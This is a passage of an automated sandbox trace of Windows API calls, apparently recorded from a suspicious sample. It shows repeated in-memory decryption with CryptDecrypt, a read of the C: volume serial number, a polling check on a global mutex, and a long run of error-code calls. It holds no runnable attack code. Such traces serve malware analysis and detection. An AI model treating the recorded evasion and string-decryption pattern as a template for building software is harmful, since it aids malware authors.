lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0066.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0066.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0066.717] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0066.717] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0066.717] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0066.717] CryptDestroyKey (hKey=0xe92870) returned 1 [0066.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0066.717] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x268 [0066.717] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0x0) returned 0x102 [0066.717] CloseHandle (hObject=0x268) returned 1 [0066.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0066.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0066.717] Sleep (dwMilliseconds=0x3e8) [0068.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0068.278] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xea2888) returned 1 [0068.278] CryptSetKeyParam (hKey=0xea2888, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0068.278] CryptDecrypt (in: hKey=0xea2888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0068.278] CryptDestroyKey (hKey=0xea2888) returned 1 [0068.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0068.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0068.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8788 [0068.278] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xea22c8) returned 1 [0068.278] CryptSetKeyParam (hKey=0xea22c8, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0068.278] CryptDecrypt (in: hKey=0xea22c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8788, pdwDataLen=0x2abf984 | out: pbData=0x2af8788, pdwDataLen=0x2abf984) returned 1 [0068.278] CryptDestroyKey (hKey=0xea22c8) returned 1 [0068.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8788 | out: hHeap=0x2af0000) returned 1 [0068.278] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0068.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0068.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0068.278] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0068.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0068.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0068.278] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xea2988) returned 1 [0068.278] CryptSetKeyParam (hKey=0xea2988, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0068.278] CryptDecrypt (in: hKey=0xea2988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0068.279] CryptDestroyKey (hKey=0xea2988) returned 1 [0068.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0068.279] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x268 [0068.279] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0x0) returned 0x102 [0068.279] CloseHandle (hObject=0x268) returned 1 [0068.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0068.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0068.279] Sleep (dwMilliseconds=0x3e8) [0069.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0069.455] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xea2ac8) returned 1 [0069.455] CryptSetKeyParam (hKey=0xea2ac8, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0069.455] CryptDecrypt (in: hKey=0xea2ac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0069.455] CryptDestroyKey (hKey=0xea2ac8) returned 1 [0069.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0069.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0069.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8198 [0069.456] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xea2988) returned 1 [0069.456] CryptSetKeyParam (hKey=0xea2988, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0069.456] CryptDecrypt (in: hKey=0xea2988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8198, pdwDataLen=0x2abf984 | out: pbData=0x2af8198, pdwDataLen=0x2abf984) returned 1 [0069.456] CryptDestroyKey (hKey=0xea2988) returned 1 [0069.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8198 | out: hHeap=0x2af0000) returned 1 [0069.456] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0069.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0069.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0069.456] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0069.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0069.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0069.456] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xea2648) returned 1 [0069.456] CryptSetKeyParam (hKey=0xea2648, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0069.456] CryptDecrypt (in: hKey=0xea2648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0069.456] CryptDestroyKey (hKey=0xea2648) returned 1 [0069.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0069.456] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x268 [0069.457] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0x0) returned 0x102 [0069.457] CloseHandle (hObject=0x268) returned 1 [0069.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0069.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0069.457] Sleep (dwMilliseconds=0x3e8) Thread: id = 8 os_tid = 0xd30 [0035.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x440) returned 0x2af94f8 [0035.203] CryptImportKey (in: hProv=0xe843e0, pbData=0x2bff8b8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2bff920 | out: phKey=0x2bff920*=0xe92330) returned 1 [0035.203] CryptSetKeyParam (hKey=0xe92330, dwParam=0x1, pbData=0x2bff908, dwFlags=0x0) returned 1 [0035.203] CryptDecrypt (in: hKey=0xe92330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af94f8, pdwDataLen=0x2bff8d4 | out: pbData=0x2af94f8, pdwDataLen=0x2bff8d4) returned 1 [0035.203] CryptDestroyKey (hKey=0xe92330) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x434) returned 0x2af9940 [0035.203] GetLastError () returned 0x0 [0035.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x214) returned 0x2af9d80 [0035.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0035.203] GetCurrentThreadId () returned 0xd30 [0035.203] SetLastError (dwErrCode=0x0) [0035.203] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.204] SetLastError (dwErrCode=0x0) [0035.204] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.205] GetLastError () returned 0x0 [0035.205] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.206] SetLastError (dwErrCode=0x0) [0035.206] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.207] SetLastError (dwErrCode=0x0) [0035.207] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.208] SetLastError (dwErrCode=0x0) [0035.208] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.209] SetLastError (dwErrCode=0x0) [0035.209] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.210] SetLastError (dwErrCode=0x0) [0035.210] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.211] GetLastError () returned 0x0 [0035.211] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.212] SetLastError (dwErrCode=0x0) [0035.212] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.213] GetLastError () returned 0x0 [0035.213] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.214] SetLastError (dwErrCode=0x0) [0035.214] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.215] SetLastError (dwErrCode=0x0) [0035.215] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.216] SetLastError (dwErrCode=0x0) [0035.216] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.217] SetLastError (dwErrCode=0x0) [0035.217] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.218] SetLastError (dwErrCode=0x0) [0035.218] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.219] SetLastError (dwErrCode=0x0) [0035.219] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 